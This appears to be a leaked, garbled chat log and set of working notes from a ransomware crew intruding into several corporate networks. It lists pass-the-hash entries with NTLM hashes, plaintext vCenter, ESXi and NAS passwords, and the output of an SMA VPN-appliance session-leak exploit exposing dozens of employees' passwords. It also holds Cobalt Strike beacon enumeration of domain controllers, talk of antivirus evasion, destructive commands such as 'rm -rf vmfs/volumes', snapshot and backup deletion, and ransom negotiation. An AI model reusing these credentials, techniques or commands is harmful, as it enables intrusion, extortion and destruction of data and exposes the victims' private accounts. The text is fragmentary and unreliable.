pth SKYTECH1.LOCAL\dtake 70b0745f98701b7e845ee0f643f72396
pth SKYTECH1.LOCAL/kton 89d585960d5cc84307a58cc796c056
pth SKYTECH1.LOCAL\mmiller bab390b9b53882a294c052f279709832
pth SKYTECH1.LOCAL/ppope 1cc7f9f96985a521d4f446baa4d317222
pth SKYTECH1.LOCAL/scadmin d8ed94135ac1934f65715849bb23158f
pth SKYTECH1.LOCAL\ABT 219ec549d9c21c9ff299ff0c9bb6c713
pth SKYTECH1.LOCAL\BESAdmin b7e996a9282b045b181ab26ba27f6242
pth SKYTECH1.LOCAL\DP.Admin.3de232cafad8fe4bbcb8439b38ea53ea 2qlp30m@10!
pth SKYTECH1.LOCAL\hcohn 674e48b68c5cd0efd8f7e5faa87b3d1e
pth SKYTECH1.LOCAL\pcsupport 1f94856253679db5c13219e28209af6f
pth SKYTECH1.LOCAL\printer c3bc7de91d256a9981721bc321eaaece
pth SKYTECH1.LOCAL\skyadmin 4c56183000f9766dc2881881af3030e8 !FlyB0y!
pth SKYTECH1.LOCAL\ABT_NOC 13ce9c02efe8314fa80702ea14a77b57
pth SKYTECH1.LOCAL\ccg c66c74eeb51a62cc730835b62145f56f
pth SKYTECH1.LOCAL\dpmonitoring 6850366281608a824050d3de0435ea87
pth SKYTECH1.LOCAL\justinladmin cb81135da647477b7617cd6a88c769f9
pth SKYTECH1.LOCAL\mech.admin 3c6a21328ef5eb39401dadadc79785c0
pth SKYTECH1.LOCAL\ppad 27ecb8e1762139addd7ab2952f2314e0
pth SKYTECH1.LOCAL\RIVERBED 073db11c8586bc9280708d8c95c86ff6


SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS
sky-beuza-01.skytech1.local


			DMW-CHUCKM1-PC.skytech1.local admin PC's


10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas



Website: https://sky-vcenter65.skytech1.local
Username: 'administrator@vsphere.local'
Password: 'Superm@n2018'


https://10.0.2.32/ui/#/login ESXi' root\$uperm@n
https://10.0.2.34/ui/#/login
https://10.0.2.36/ui/#/login
https://10.0.2.38/ui/#/login
https://10.0.6.24/ui/
``Go to sleep all night, the session is in the slip, the files have been deleted.
good night good love is more expensive than money)apparently:D braggingbamba why is it here?)and morefiles were lost? in the slip have thrown sessions? good night good night then this + - to 4-5 nights and until the end until we close two networks tomorrow by 16:00 so we shift to 4 day tomorrow night close if tomorrow morning will not work tomorrow morning be in place by 11, in the morning close the grid to 10 todaydavay then close it today..571 koba you have on the team is the second koba do not even need less than 100 servers, although the grid is not big and if the armies to mount the servers will do with what is there I think just take your colleagues tomorrow planned another 4 in total if you have everything ready we can today will also close tomorrow? no, with the last koba problem is likely to replace tomorrow koba today wait?if there is a problem, then feedback here or if in lsv case you have doubts you can check in your conditions (on the deck) i had the day before yesterday, i think, assembled - it works. and @user9 today i did it, it does not work. hehehehehe nevertheless i had a feeling that he would be fine if he got a little frustrated. really now armas in the network just nothing. yesterday there were more@user4 on the classic zamakte to the servers? looking for access to the trusts, trying to pull the network to kobu nas, check the options, how to interact with armasak write me here 1 person from the team 1 message what are we doing now on your networks mepereperemple) @user9 you had 4.2 give it to everyone please+@user7 give it to your colleagues? or you stupidly will not let the client take only a new one all day come on hurry up 1 is delayed there are 2 koby newokk @user8 thenokmdon't care who wants to help @user8 and @user4@user7 @user9 I haven't created anything yet[ ](https://mediaeveryone.com/channel/general?msg=p3HK9CSDutpKMds27) and I haven't created anything for you? I don't have a conf) or you mean #lrhc-org? @user7 Also @user9 write a report in the confu I'm picking SNU.EDUgoersportnu I have devry.edu, but I'm there a week already digging and in a deadlock practically, who has what tasks at the moment?:man_raising_hand:hello all:space_invader:tomorrow both are closingdone the other 2.kznmughu, that's itvrp blocked by this is no ping setup according to the manual through the system interface no configser:IntSniDPlT6NZww6lqxw `206.221.176.24:12372` give us the config I have no scanner on the deck even if they dropped the coboo? so what? we are not going to forward sessions from the network
Sessions from the dedicle are stalled. If the dedic is locked, then yes [ ](https://mediaeveryone.com/group/evo-com?msg=KqNpb6s2bNEb29MYE) ???
keymiss.com
kimhd.com
``If we need our dedic and ipn in the coba[ ](https://mediaeveryone.com/group/evo-com?msg=nKHfycDdHecz9t6ma) ??? What's the coba got to do with any of this? I take it the coba was dropped. What the fuck is your problem with the dk?
maybe the icmp's just blocked
Just scan it to 445 just to get the whole thing.
C:\Users\user>ping -n 1 172.17.70.8

Pinging 172.17.70.8 with 32 bytes of data:
Request timed out.

Ping statistics for 172.17.70.8:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
``The name was resolved without a lock then 172.17.70.8 from the addicts behind the VPNPinging evo.local [172.17.70.7] with 32 bytes of data:
Request timed out.

Ping statistics for 172.17.70.7:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),and what's stopping him from hitting a rdp or something[ ](https://mediaeveryone.com/group/evo-com?msg=2PzAw9f6Gk6hLWiYA) I think a couple of exact 6am starts to clean us? 3 I told you, admins are scared of any alerts, they're 3 km away, the net is probably fucked up, you've failed to send alerts to Cbdk is unavailable, sessions are down again, the main thing is to remember the accesses and settings, and preferably look for ones that are closer to you by geo, because the speed will be the limit on the channel@tl1 will give
here you can take the brutalized daikas for 2-5 bucks any i reckon? and put everything in nulinmax kilnet services and processes by batnyms on the net remotely just a few daikas on vpn will startwhy it will not doena karbon yes, i think, if it is not cut off, we do nothing here on karbon often 2fa?[ ](https://mediaeveryone.com/group/evo-com?msg=gfgePBNWxTQR2ETHJ) yes, the vpn works
i can't see the ldap, it won't give out anything i can't get it to work over the dub. over the wpn doesn't work? in some cases i've had to run mimic a few times, any command you run but ps\ls and so on you run it and the session dies
how do i get backupkey without mimic? nope, i don't have time to run mimic - session dies But i don't believe it, you need domain masterkey, i'll try to take it off. do it like we did when we discussed drino chrome, we can't take it off, it takes 10-15 seconds to kill the session, you can either make_tokerthe context of the user) well fuck it)
cb any injector chopskob or avNa servers / armas, why I do not know. After about 10 seconds it falls off. Logging in with delkihere how and why? Sessions are dropping (((``.
	 * Username : vipreadmin
	 * Domain : N0fUck!NCr1++3r$
``The drop in revenue has directly affected our margins :( ``the faithful have long noticed that everyone starts with 10 percent1 quality lock))) apparently they are with the ends of the locks funny)340k offer)on the overland negotiators already)+hold both
[+] Checking URL https://66.161.144.31
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.3-24sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 0hxjuDPHx83Rx4vG8T96wfFnQJGVF4UZhT4JrIxBFCYU= userType: 1 userName: rhaffey Password: Carebear11 Domain: Planes
      [+] Found: SessionID: 1XVOagEBBe6ptLv3yQbhtq0lFpb10KBXlKkRrxUhoKw= userType: 1 userName: mwest Password: Howklmw4 Domain: Planes
      [+] Found: SessionID: 1ckROGo1Wh7imySZPl7uMtcThtOiXie239BHZP95Xho= userType: 1 userName: grikmim Password: mrckk-0020 Domain: Planes
      [+] Found: SessionID: 8hrnUTXzfeMdpqBv0uQ6bZG13AJC8QIEezcikn6rRlU= userType: 1 userName: gexnill Password: Fruitninja22 Domain: Planes
      [+] Found: SessionID: 9pJuG9Tld0RDo08uJYlOoGD0VrQvFKue6qkPfip2dVI= userType: 1 userName: romber Password: Gberry700! Domain: Planes
      [+] Found: SessionID: DNmFdoJaPCMVDgQ1Z4FwvwMTE5QBqtFMiwBe9BOMZjQ= userType: 1 userName: mitriks Password: AEVT030121! Domain: Planes
      [+] Found: SessionID: EWtPIi0Eb05MnQhVXQLSqCTNnEtoz5GqRL0WLvU17sk= userType: 1 userName: redgemmtb Password: Tr!
      [+] Found: SessionID: NeCBR0enViW4ICjFiFeW1F8D92KfgWrTvWgv6007TKM= userType: 1 userName: jmurchis Password: Sabian44987#@ Domain: Planes
      [+] Found: SessionID: OSKex2Y0GoB38oixxxdQQYc0MT5nKJxf4oeKdSo8yxI= userType: 1 userName: kinjens Password: Greeleys7145 Domain: Planes
      [+] Found: SessionID: PFCReDwF0qqxJW36ByuCDpZ5J0Zhdl6AfZr8rwFyNEbo= userType: 1 userName: cenglish Password: Alexa019 Domain: Planes
      [+] Found: SessionID: S52bhF0epI6AWy2O5NVtpUT5rZR2qlVUIRxpfSUXnoM= userType: 1 userName: tilewa Password: Odin2021 Domain: Planes
      [+] Found: SessionID: SiHFTV6qqKeYsOaTDH8xA4PkOvUW36syhQlhyZjBE30= userType: 1 userName: lesdorn Password: MountVernon25** Domain: Planes
      [+] Found: SessionID: W1lJsx3fZ100ndMXQPAceYzqyXC1spoSv0zMq5a5hpg= userType: 1 userName: kyteldra Password: Kcakalpld0517! Domain: Planes
      [+] Found: SessionID: WCrZqMccVULFytN0wPY4rB8K636yaP5cV1W5911pRdg= userType: 1 userName: keynemik Password: LumbarL3 Domain: Planes
      [+] Found: SessionID: Z9sppmZwgJec3Jk0Kcv05sSmQvFwyoe0UVGkv251SeM= userType: 1 userName: dmontgom Password: January2021 Domain: Planes
      [+] Found: SessionID: advcBv38ZtYqUBAZCVVJl6QoZahzK0UPV5JGBzpLNgk= userType: 1 userName: valura Password: Lacapi2021 Domain: Planes
      [+] Found: SessionID: bBNhpCwSpZvM7dA04zlPGZvJoBZdk4Z6HMu9wGm3FVg= userType: 1 userName: jmcgrath Password: 36R-mel*21 Domain: Planes
      [+] Found: SessionID: djXXAOgtFljaj3O9l7OgG2VC8fyYPyPkjb5j1BF1QCNMI= userType: 1 userName: gkeifer Password: Hrmboys8! Domain: Planes
      [+] Found: SessionID: fUvKJ6qa7PkHQWQWcOeUBBRJctY4JUqJtUGDLVSzLGgns= userType: 1 userName: gcarney Password: Happy2021 Domain: Planes
      [+] Found: SessionID: kVgDYoRK1ajqbOijrK1uGLNeXE0T99We5MlZSPkXCg= userType: 1 userName: bbradford Password: H@ndb@ll2021 Domain: Planes
      [+] Found: SessionID: kv38f02A9WSGjNj0xjVedVFinxYdWiyeNZ4aXnYOtCkE= userType: 1 userName: esolotim Password: Qwerty19 Domain: Planes
      [+] Found: SessionID: lY1v5WeWLHRc2qZQyyrHLtBc4rdOk9LzTvffD108Tc= userType: 1 userName: fsmith Password: Castle47####### Domain: Planes
      [+] Found: SessionID: n6R7KD4fgc11jsFwF0KV5iduYKRSPyveO22K7zCO1CE= userName: 1 userName: barnlisa Password: ROSIEb22 Domain: Planes
      [+] Found: SessionID: nRoJ3ZfgAlELS0rtqpLJtpXwRJ6OcBNVflg9KxlcX1s= userType: 1 userName: croltiny Password: globalWORKplace7! Domain: Planes
      [+] Found: SessionID: qB1kBsFrKOLYL4w9aOktA6jYoJTMc68KRJJoXo3siXCnE= userType: 1 userName: mwinters Password: Carnage2021 Domain: Planes
      [+] Found: SessionID: u0Xqpn7w8fS4vZn6SAO1JFUYHUTczh5Y5yeoxebQWWg= userType: 1 userName: sanski Password: Jac2010! Domain: Planes
      [+] Found: SessionID: uxs9u9LxBrtY1Oqrx3WuEJPXOsEvmhgMhvr1JHl3rRw= userType: 1 userName: mshafor Password: February2021 Domain: Planes
      [+] Found: SessionID: v1buCFcYonMDuhyVfRnHwBh6YgNpqjwhTSe5eSMoYu8= userType: 1 userName: ferncroa Password: Bengals21 Domain: Planes
      [+] Found: SessionID: v5i1hwKI0xbE01s9nPuO9F531n0MxrNE0YYyyel2za0k= userType: 1 userName: wbowen Password: Dptwmb2028 Domain: Planes
      [+] Found: SessionID: vu19JgbC8zsPGm0q8phBOqUsKIFtkn9itd00j06MuAI= userType: 1 userName: gflasch Password: Pepper33$ Domain: Planes
      [+] Found: SessionID: wGwVAfJOrLok0CrbbB7g9dUQAlZP2YsQmw9p1113thE= userType: 1 userName: jamafd Password: Hobart2535y Domain: Planes
      [+] Found: SessionID: wbL2CzsEWESKJxcQw13TBJ7ebU4i6bl7qnffGC0n8Afw= userType: 1 userName: obrown Password: Planes0121 Domain: Planes
      [+] Found: SessionID: yNylXi0x041YdNCoxmjaGiwG5Y22WNb4tcqD5Dkid1Y= userType: 1 userName: moordavi Password: Planes1! Domain: Planes
[+] Done with https://66.161.144.31, found 33 sessions
``````
[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFFQpSM= userType: 1 userName: suanino Password: Hotshots23 Domain: L&M Domain
      [+] Found: SessionID: 2urLQzwRsyR8FeQ16VaeYISe9gx2GjzEsv72IJeAvgs= userType: 1 userName: rcarrington Password: Rlcbkjcngm987! Domain: L&M Domain
      [+] Found: SessionID: 79iXsjaZpFZpfHSj3Ij1jtx8nABpP8QVMWftVldHrMaw= userType: 1 userName: mlong Password: Joshua2013!!!!!!! Domain: L&M Domain
      [+] Found: SessionID: 8toG4Gmy3DmF9dC4SIG8xGNjILAsXynGs8QT1mr6tHU= userType: 1 userName: kurban Password: DeerHunter22! Domain: L&M Domain
      [+] Found: SessionID: 8z190N9G2yCG14bTKpo68J0XDqzOCwPh5mQCheC8DPw= userType: 1 userName: nfranklin Password: Sundae24!!! Domain: L&M Domain
      [+] Found: SessionID: 9dJs2tiaLfZpV0Ma7g79oY1aG4FvW79kZIkVJU7tnqQ= userType: 1 userName: tegan Password: Mylilbuddy1 Domain: L&M Domain
      [+] Found: SessionID: ANDOyUyyl83haHEqaDbW13thjxrxpXsySbIXwK0rcGw= userType: 1 userName: rcraighead Password: Afapek112819 Domain: L&M Domain
      [+] Found: SessionID: Di0eR39DlxGZqqkVMdkQ20bSKw4z2Uo2zHnxAQZrC0S4= userType: 1 userName: terriw Password: Merrow3s934 Domain: L&M Domain
      [+] Found: SessionID: GIzvltAkPe26aebMF4CtohrIBaJrtO7FLvYslvZE0Iw= userType: 1 userName: mwilson Password: RiverMae@11 Domain: L&M Domain
      [+] Found: SessionID: GJwdPkGWSom4T4JP1JPooIVCY5voOguyrBsZmjFUaeLtg= userType: 1 userName: kcarrington Password: G@lDR063r6 Domain: L&M Domain
      [+] Found: SessionID: InbYkxJ3mH25VGAHIQb01Iqsgiigau3AhN2G7XJprHQ= userType: 1 userName: ssimmons Password: Coffee123! Domain: L&M Domain
      [+] Found: SessionID: Kk4ZwUtcpCl7ozEkAKv001HZlGnPaaTlZLr6g3HJsRw= userType: 1 userName: hmckinney Password: Family2020! Domain: L&M Domain
      [+] Found: SessionID: MovBR6w0IEb3zi10yKeZEQAxhnX6FvffdnToB52EGlY= userType: 1 userName: Bjones Password: @pr!lSh0werz1997ch Domain: L&M Domain
      [+] Found: SessionID: NjNnAwqla1uOuTn1fn1fE3p5XNvQ5Ox9JXAICPmWv0PPUk= userType: 1 userName: sbushnoe Password: Winter2020! Domain: L&M Domain
      [+] Found: SessionID: R1n01UtSop80AzxWza6lGCvBgqhRUvWoaO37cF7wG7A= userType: 1 userName: bjohnson Password: Multigard!@#$ Domain: L&M Domain
      [+] Found: SessionID: WFv4gr1f2DaaoE5KVayg4otU6hdLdFqWXYm8EM60PrcE= userType: 1 userName: toutman Password: Lightning02 Domain: L&M Domain
      [+] Found: SessionID: WTxex4JI0WxT5BhqrexrtTTALLHvU5A2QYohVpxtvjs= userType: 1 userName: georgew Password: 195Deeznuts$ Domain: L&M Domain
      [+] Found: SessionID: XhI3mae1Lxc7KLkcqqTkfi1S7lp5nW911N72LTQom0Yc= userType: 1 userName: tshaw Password: lamTEN#5053 Domain: L&M Domain
      [+] Found: SessionID: YwTFCvcrti79HYq8DTV43VU5vhqHC4cNzcC86OLunyc= userType: 1 userName: rdake Password: Carsyn12345 Domain: L&M Domain
      [+] Found: SessionID: bKVOGsqTD6dIGUfLaLeoraJyswAbkDZftcVW5QeKsPY= userType: 1 userName: jzeman Password: Bluebird11 Domain: L&M Domain
      [+] Found: SessionID: cCMKVWpdz76nmwmUSFilNoqlHRLefonQH0llEt8T0G8= userType: 1 userName: moscar Password: $Shell123456789 Domain: L&M Domain
      [+] Found: SessionID: gamTBY5ApMu1IIyMn4x9VztNpfYws0p5fLOw2VejseY= userType: 1 userName: mgarrison Password: Roscoe1971! Domain: L&M Domain
      [+] Found: SessionID: h3nDgyEj7JDo8BaSNkaxJbgM80kv15xVXLqeobLWI0w= userType: 1 userName: lindab Password: Hobart528$20211 Domain: L&M Domain
      [+] Found: SessionID: jszrMOtthNXAO10JW5RIO7MW18D5isBJlOb02qBGEBQ= userType: 1 userName: dlindblad Password: Hicksville83 Domain: L&M Domain
      [+] Found: SessionID: lJjQi2ri9viQWQ1XEmCvrAfnmmV3Ev2CS0wwq92riAs= userType: 1 userName: tbishop Password: P0L!1nS3c0Nn0 Domain: L&M Domain
      [+] Found: SessionID: lufvh9TXJezldkQQ2KF5mimA3mnwS9qneyWGr4TFPOU= userType: 1 userName: cjackson Password: h44RsF2PP* Domain: L&M Domain
      [+] Found: SessionID: sDrdLmvwALSF3jTMnSUkHYwq9ZfWqPcbd0PlX0bBJ5o= userType: 1 userName: acox Password: December2020 Domain: L&M Domain
      [+] Found: SessionID: smA9plEUTxuk1LKzY0qOLCsOC7n7SJlG7pVwnj9aj9o= userType: 1 userName: cfarrell Password: Covid2019! Domain: L&M Domain
      [+] Found: SessionID: tel1xLliHnrxuJ4jG9eA1RfLrHgIi5RFNFdmA9qM9rA8= userType: 1 userName: lstrzegowski Password: Whiskers45$ Domain: L&M Domain
      [+] Found: SessionID: tn9IFU4flYiaulqazAeVJA5vWp5thOOj2ZzTvq08C9U= userType: 1 userName: aluckey Password: SelenaBrody&Champ35 Domain: L&M Domain
      [+] Found: SessionID: vhyW0wcf8tOIlogYk7tb4qpKNYGlZGPeAU1EiL1b8XY= userType: 1 userName: nthompson Password: Trinity2011 Domain: L&M Domain
      [+] Found: SessionID: wOfMo3AmB7a0a0a0tk8Js1kpwwINyCCTOHKWHIkhutrag= userType: 1 userName: sriggs Password: Sammers0309# Domain: L&M Domain
      [+] Found: SessionID: x1Fb1A3YjVnXF40T10eItH4OdjRdsxZG7MrCtqDLpxA= userType: 1 userName: tfewster Password: BabyItsColdOutside1 Domain: L&M Domain
[+] Done with https://107.0.14.250, found 33 sessions
33
[+] Saving session data
[+] Trying session 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFfQpSM=
[+] Saving config to ./Dumps/107.0.14.250/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 143 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds sslvpn:4311_Secure@10.1.1.45

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds

[**] Found bookmark with creds
[+] Found bookmark {'name': '1', 'username': 'sslvpn', 'password': '4311_Secure', 'service': 'RDP', 'host': '10.1.1.45'}
com/group/1-done-expederal-com?msg=G2z6E3Dm4XPiahEer) no)) backups were on the wine servers1.done.expFederal.com there were not vim? so we can not do anything with them linux software we have no@user4 fuck you revealed all the cards))
USCHI-DT005.Hobbes.loc [10.20.20.37]
sh-0004.hobbes.loc [10.20.4.4]
DT-000016.Hobbes.loc [10.20.20.53]
LT-000047.Hobbes.loc [10.20.99.175]
LT-000060.Hobbes.loc [10.20.20.30]
USCHI-TB001.Hobbes.loc [10.20.99.173]
LT-000073.Hobbes.loc [10.20.99.172]
uschi-psc001.hobbes.loc [10.20.4.56]
TB-000025.Hobbes.loc [10.20.99.151]
USCHI-HR-LT201.Hobbes.loc [10.20.99.153]
TB-000028.Hobbes.loc [10.20.20.22]
TB-000034.Hobbes.loc [10.20.99.160]
DT-000037.Hobbes.loc [10.20.20.71]+
USCHI-AI-LT321.Hobbes.loc [10.20.99.178]
LT-000116.Hobbes.loc [10.20.99.172]
USCHI-PM-DT607.Hobbes.loc [10.20.32.201]
USCHI-EM-LT403.Hobbes.loc [10.20.20.23]
USCHA-EX-LT003.Hobbes.loc [10.6.0.105]
```
These are linux armas (at least there is no ipc$ or admin$ or c$ yb d$ etc) ```.
Host Name: USCHI-SBS002
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-70390-48722-AA601
Original Install Date: 5/15/2019, 3:10:42 PM
System Boot Time: 12/9/2020, 5:51:51 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz
                           [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 16,383 MB
Available Physical Memory: 15.093 MB
Virtual Memory: Max Size: 18,815 MB
Virtual Memory: Available: 17,620 MB
Virtual Memory: In Use: 1,195 MB
Page File Location(s): C:\pagefile.sys
Domain: Hobbes.loc
Logon Server: N/A
Hotfix(s): 13 Hotfix(s) Installed.
                           [01]: KB3186568
                           [02]: KB4049065
                           [03]: KB4494175
                           [04]: KB4498947
                           [05]: KB4503537
                           [06]: KB4520724
                           [07]: KB4524244
                           [08]: KB4540723
                           [09]: KB4550994
                           [10]: KB4562561
                           [11]: KB4565912
                           [12]: KB4576750
                           [13]: KB4593226
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Internal
                                 DHCP Enabled: No
                                 IP address(es).
                                 [01]: 10.20.32.20
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: External
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.111.1.64
                                 [02]: 10.111.1.63
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

```
I found this shit, here's some hosts spinning under 1 ipi153 was alive on the input) and 57 armas of 10053 servers of which 46153 hosts[ ](https://mediaeveryone.com/group/expfederal-com?msg=kfJRgvJSmNwimgd78) armas sure enough? I can not say more than that of the ones I work with, they are my favorite top down u v w x y z```
Disconnected U:        \10.111.1.32\C$ Microsoft Windows Network
Disconnected V: \10.20.32.200$ Microsoft Windows Network
Disconnected W:        \10.20.32.103$ Microsoft Windows Network
OK X:        \10.20.32.101$ Microsoft Windows Network
OK Y:        \10.20.32.202\C$ Microsoft Windows Network
OK Z:        \10.20.32.21\C$ Microsoft Windows Network

I had a few servers that neither vmik, nor jump, nor remot eksekzekom did not attract30 unique ip armies)
10.20.20.46
10.20.20.37
10.20.20.50
10.20.32.90
10.20.4.4
10.20.20.53
10.20.99.150
10.20.99.163
10.20.99.158
10.20.99.175
10.20.20.31
10.20.20.30
10.20.99.152
10.20.99.173
10.20.99.172
10.20.99.159
10.6.0.105
10.20.4.56
10.20.20.56
10.20.99.151
10.20.99.154
10.20.99.153
10.20.20.22
10.20.99.156
10.20.99.160
10.20.20.71
10.20.99.178
10.20.99.180
10.20.32.201
10.20.20.23
``52 unique ip''
10.20.32.100
10.111.2.20
10.20.32.28
10.111.1.31
10.111.1.15
10.111.2.15
10.20.32.203
10.111.1.32
10.20.32.200
10.20.32.93
10.20.32.34
10.20.32.40
10.20.32.31
10.111.1.33
10.20.32.13
10.20.32.14
10.20.32.6
10.20.32.4
10.20.32.20
10.20.32.30
10.20.32.18
10.20.32.72
10.20.32.175
10.20.32.24
10.6.0.5
10.6.0.56
10.6.0.58
10.20.32.71
10.20.32.70
10.20.32.188
10.6.0.30
10.20.32.33
10.20.32.50
10.111.1.50
10.20.32.5
10.20.32.7
10.20.32.60
10.20.32.75
10.20.32.76
10.111.1.10
10.20.32.15
10.20.32.202
10.6.0.60
10.20.32.21
10.20.32.101
10.20.32.102
10.20.32.103
10.20.32.45
10.20.32.73
10.20.32.74
10.20.32.46
10.20.32.110
i had a report on the pings of the servers? 46 ip53 hostname or did you count 53 and 46 by ip? because hostnames refer to the same ip53 = 46? 46 servers shut down100 armas and nix53 serversa total of 153 live hostnames were with armas as soon as the servers 53
```
LT-000082.Hobbes.loc [10.20.99.175]
LT-000047.Hobbes.loc [10.20.99.175]
``[ ](https://mediaeveryone.com/group/expfederal-com?msg=z4FdusPQAXacvdFZj) total livehosts 53? so they have a few hostnames per ip53a fuck the number of livehosts in generalaahaa those 7 servers that are not closed what about them? 53 servers alive, 89 were in adcom how many live were otklabbed servers somehow not enough236 in adcom, there a bunch of old not thick however...236 comps total
53 pinged servers, closed 46
57 pinged armies, closed 39 and with armies so jeservers/closed servers shut downstatuvezde there are notes for stats guys18 armies minusda)),kznm```
Teemo beacon> net dclist
[*] Tasked beacon to run net dclist
[+] host called home, sent: 104506 bytes
[+] received output:
DCs:


[+] received output:
 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 6118
```

```
beacon> shell nltest /dclist:Hobbes
[*] Tasked beacon to run: nltest /dclist:Hobbes
[+] host called home, sent: 52 bytes
[+] received output:
Get list of DCs in domain 'Hobbes' from '\\USCHA-DCG002'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
The command completed successfully
```
```
Teemo beacon> shell nltest /dclist:Hobbes.loc
[*] Tasked beacon to run: nltest /dclist:Hobbes.loc
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'Hobbes.loc' from '\\USCHA-DCG002.Hobbes.loc'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
The command completed successfully


``Fucking figured it out... You need to do an inject in the winlagon, then the flight is normal. and one is not pinged so there is already a note everywhere this does not always work immediately check the other way ``
Teemo beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:


[+] received output:
[-] Error: 0
I have a lot of trouble with this, I can't get it to work, I'm not sure if it's working, but it's not working. wait for confirmation from voodootry it through eheav and def off? did not help gjvjukj that will be the current state you are here should remain uninstall they are replicated look, we have two snapshots, if we delete them, then we will also rub the machine?or the classic way to mask the disks somewhere try to offload av, vindefTry different archa in general clean the root home folder root[ ](https://mediaeveryone.com/group/expfederal-com?msg=6dKMvPj8Za59kfYWw) the command below what is it? hang 20 minsli avers or something there is nothing - check if the bitness of the injected dll coincides with the bitness of the system
[root@uschi-vhp001:~] cat /etc/passwd
root:x:0:0:Administrator:/:/bin/sh
daemon:x:2:2:System daemons:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/:/sbin/nologin
dcui:x:100:100:DCUI User:/:/sbin/nologin
vpxuser:x:500:100:VMware VirtualCenter administration account:/:/bin/sh
rootmgmt:x:1000:1000:ESXi User:/:/bin/sh
vxpsvc_ptagent_op:x:1001:1001:ESXi User:/:/bin/sh

``If it gets up, it means that the injection process itself is being tapped by an aver or something[ ](https://mediaeveryone.com/group/expfederal-com?msg=ppyLCj2p7LQ9XuXpp) strange but there seems to be nothing to clean it hangs? or "gets up" ?on some armasPrimary injection kryptor session hangs you hope to clean the history of commands in linigui bluntly still such a thing through the gui better`rm -rf vmfs/volumes` look in the properties / settings no))) you there lin not format) and how to delete the previous snapshots, so as not to lose the current one?i don't want to lose the current snapshots) leave the current snapshots and then start the process from there and delete the snapshots in the wok, go to the web as it was before and delete the snapshots from the spheres in the wok and leave the current state from the center in the web interface where do you delete in general) rm -rf is that ok?more in the processesnaps deleted from the center and with veem resolved? in the rest everywhere there is a note they need to reattach and armies * if everything is ok, close dk check all servers for a note krasavchiki + armies, also all? dk fuck all? servers are almost all, just re-sleep a few pieces)) but they work, probably session with proxy hangs, we thought the nicks servers sphere rejecteddah hz) and what shutdown you were talking about at all?)on the nixes lie snapshots are deleted we pulled these virtual servers, their polochimnu disconnected like what? *snapshots started deleting bekapov virtual disks where these servers lie? get them to lock or they are on the nix somewhere? armas pull pull or pull armas already pulled betterwhen all pull now will demolishDid you delete the seksnapshots? no, the pings passed[ ](https://mediaeveryone.com/group/expfederal-com?msg=2mcqWpWjKLkka3NdD) maybe they have a notifier to enter the csi or something...are you talking about the sphere? they probably shut it down did they get something wrong? they removed the servers with virtual machines from the network. what do we do? 10.111.2.20 one more dk not pull
10.20.32.101
10.20.32.21
10.20.32.202
10.111.1.10
```
servers, no dns and dk for later ```.
Get list of DCs in domain 'HOBBES' from '\\USCHI-DCP001'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
